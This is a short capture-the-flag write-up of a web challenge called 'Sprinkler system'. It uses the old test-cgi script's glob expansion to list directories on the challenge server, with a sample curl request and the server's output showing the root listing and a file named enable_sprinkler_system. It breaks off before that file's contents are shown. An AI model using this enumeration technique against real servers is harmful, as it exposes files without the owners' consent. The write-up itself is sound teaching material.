Sprinkler system - Web (100 + 0)
Damn new york… some chick tricked you into standing in the rain on the very first day… it’s payback time!
Starting by looking into robots.txt
We have a hidden directory /cgi-bin/test-cgi, my first instinct was to try shellshock but ofcourse it didn’t work so after a while searching in google I found this http://insecure.org/sploits/test-cgi.server_protocol.html.
To list the root directory we can do this:
CGI/1.0 test script report:
argc is 1. argv is /\*.
SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = */*
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = /app /bin /boot /dev /etc /git /home /lib /lib64 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var
REMOTE_ADDR = 18.104.22.168
Nothing special on the root directory lets try to list the current directory to instead of doing ?/ lets try ? at the end of the url:
$ curl 'http://sprinklers.alieni.se/cgi-bin/test-cgi?*'
It works! there is a file named enable_sprinkler_system! lets see what is its content: